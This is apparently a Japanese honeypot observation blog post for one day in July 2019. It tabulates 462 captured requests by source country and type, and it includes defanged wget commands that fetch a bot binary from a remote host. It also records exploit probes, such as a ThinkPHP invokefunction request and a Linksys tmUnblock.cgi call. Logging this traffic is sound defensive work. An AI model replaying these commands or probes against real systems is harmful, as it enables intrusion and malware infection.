WOWHoneypot観察(126日目)
2019/07/20(土)
トータルは462件でした。
ハンティングログは以下です。
| 66.153.194[.]203 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl |
| 195.24.207[.]169 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl |
| 137.117.92[.]194 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl |
| 155.4.63[.]69 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl |
| 99.165.180[.]226 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl |
| 82.62.242[.]189 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl |
| 208.59.69[.]28 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl |
www.virustotal.com
www.virustotal.com
IPのロケーション別の件数は以下です。
| スイス | 360 |
| ブラジル | 32 |
| アメリカ | 20 |
| 中国 | 16 |
| スウェーデン | 3 |
| インド | 3 |
| インドネシア | 3 |
| ウクライナ | 2 |
| セルビア | 2 |
| オランダ | 2 |
| イタリア | 2 |
| イラン | 2 |
| チェコ | 1 |
| ルーマニア | 1 |
| トルコ | 1 |
| イスラエル | 1 |
| エストニア | 1 |
| 南アフリカ | 1 |
| ケニア | 1 |
| バングラデシュ | 1 |
| セントクリストファー・ネイビス | 1 |
| カメルーン | 1 |
| ポーランド | 1 |
| スペイン | 1 |
| リビア | 1 |
| ギリシャ | 1 |
| アフガニスタン | 1 |
| 件数 | 概要 | リクエスト |
|---|---|---|
| 382 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
| 56 | アクセス | GET / |
| 7 | LinksysルータのEシリーズの脆弱性を狙った通信POST /tmUnblock.cgi | |
| 3 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
| 3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
| 3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
| 1 | SpringDataCommonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
| 1 | 不正中継の調査 | GET hxxp[:]//www[.]sogou[.]com/?0.356854474040614607514232 |
| 1 | 不正中継の調査 | GET hxxp[:]//www[.]lycos[.]de/?0.148963251402522088487268 |
| 1 | Yealinkの調査 | GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status |
| 1 | アクセス | GET /favicon.ico |
| 1 | phpMyAdminの調査 | GET /admin-scripts.asp |
| 1 | 不明 | GET /Panel/ |
| 1 | 不正中継の調査 | CONNECT www.google.com:443 |
にほんブログ村